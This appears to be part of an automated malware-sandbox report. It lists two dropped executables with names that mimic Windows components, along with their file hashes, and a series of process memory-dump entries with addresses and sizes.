060d1c6e2a706bf3f375eb50647ba4820ac0c9f2d34838bda5f0303f1ef14e75e83d9167e9f50a19d72bfe4bb55fc28b7e64aa650e379f5dd2077b9e3ebbbdba

Download Submit
C:\Users\Admin\WindowsDriverFoundation.exe

Filesize
74KB

MD5
e40cf402a05b77c43a1934802059a39d

SHA1
126f95a2d81c7007214be6933862485292fab294

SHA256
edcae846e567107bdc6a741cdda70b82cd2526829899bc16ba4651f68e76a16c

SHA512
ded21984cf2d95b9cab4b677f2c58cadd914f3b5b63ecae056bcfd55bfd43c03433dbef73156aaa99c4a1fd47a8e32e0371f49ae5113beca31a47dd8221f1259

Download Submit
C:\Users\Admin\WindowsSmartScreen.exe

Filesize
69KB

MD5
603b4a00b2f8cb021066710cc002e323

SHA1
8d8b2f0e16de8c3e40485f608405bce07a31b49b

SHA256
5e380cae6f287ef4a209916f2e0f86e1511bec721fe85ddbab2bcb30255ad9a2

SHA512
0beefc1647b5e4cdd058c0a0d1e7c739297733f4d4dbf4cf5f2588b2c1c23049376c392150a375df855a27e4c99cf05f2c924427bc457bbe7ca53e58d8958956

Download Submit
memory/1560-72-0x00000000004A0000-0x00000000004B8000-memory.dmp

Filesize
96KB

Download
memory/3720-199-0x0000000007470000-0x0000000007484000-memory.dmp

Filesize
80KB

Download
memory/3720-188-0x0000000007420000-0x0000000007431000-memory.dmp

Filesize
68KB

Download
memory/3720-187-0x0000000007150000-0x00000000071F3000-memory.dmp

Filesize
652KB

Download
memory/3720-177-0x0000000074240000-0x000000007428C000-memory.dmp

Filesize
304KB

Download
memory/3720-176-0x0000000006050000-0x000000000609C000-memory.dmp

Filesize
304KB

Download
memory/3720-174-0x0000000005AC0000-0x0000000005E14000-memory.dmp

Filesize
3.3MB

Download
memory/4012-198-0x000002369C250000-0x000002369C272000-memory.dmp

Filesize
136KB

Download
memory/4292-98-0x0000000005B30000-0x0000000005B96000-memory.dmp

Filesize
408KB

Download
memory/4292-140-0x0000000074E40000-0x0000000074E8C000-memory.dmp

Filesize
304KB

Download
memory/4292-86-0x00000000028C0000-0x00000000028F6000-memory.dmp

Filesize
216KB

Download
memory/4292-152-0x0000000007540000-0x000000000754A000-memory.dmp

Filesize
40KB

Download
memory/4292-89-0x0000000005280000-0x00000000058A8000-memory.dmp

Filesize
6.2MB

Download
memory/4292-95-0x0000000005A20000-0x0000000005A42000-memory.dmp

Filesize
136KB

Download
memory/4292-97-0x0000000005AC0000-0x0000000005B26000-memory.dmp

Filesize
408KB

Download
memory/4292-110-0x0000000005BA0000-0x0000000005EF4000-memory.dmp

Filesize
3.3MB

Download
memory/4292-157-0x0000000007800000-0x000000000781A000-memory.dmp

Filesize
104KB

Download
memory/4804-73-0x00000000006E0000-0x00000000006F8000-memory.dmp

Filesize
96KB

Download
memory/4960-139-0x00000000072A0000-0x0000000007343000-memory.dmp

Filesize
652KB

Download
memory/4960-154-0x00000000075D0000-0x00000000075E1000-memory.dmp

Filesize
68KB

Download
memory/4960-138-0x0000000006680000-0x000000000669E000-memory.dmp

Filesize
120KB

Download
memory/4960-128-0x0000000074E40000-0x0000000074E8C000-memory.dmp

Filesize
304KB

Download
memory/4960-127-0x0000000007050000-0x0000000007082000-memory.dmp

Filesize
200KB

Download
memory/4960-123-0x00000000060E0000-0x000000000612C000-memory.dmp

Filesize
304KB

Download
memory/4960-122-0x00000000060B0000-0x00000000060CE000-memory.dmp

Filesize
120KB

Download
memory/4960-150-0x0000000007A20000-0x000000000809A000-memory.dmp

Filesize
6.5MB

Download
memory/4960-156-0x0000000007630000-0x0000000007644000-memory.dmp

Filesize
80KB

Download
memory/4960-155-0x0000000007620000-0x000000000762E000-memory.dmp

Filesize
56KB

Download
memory/4960-158-0x0000000007710000-0x0000000007718000-memory.dmp

Filesize
32KB

Download
memory/4960-153-0x0000000007660000-0x00000000076F6000-memory.dmp

Filesize
600KB

Download
memory/4960-151-0x00000000073D0000-0x00000000073EA000-memory.dmp

Filesize
104KB

Download
memory/5116-120-0x0000021F12050000-0x0000021F12051000-memory.dmp

Filesize
4KB

Download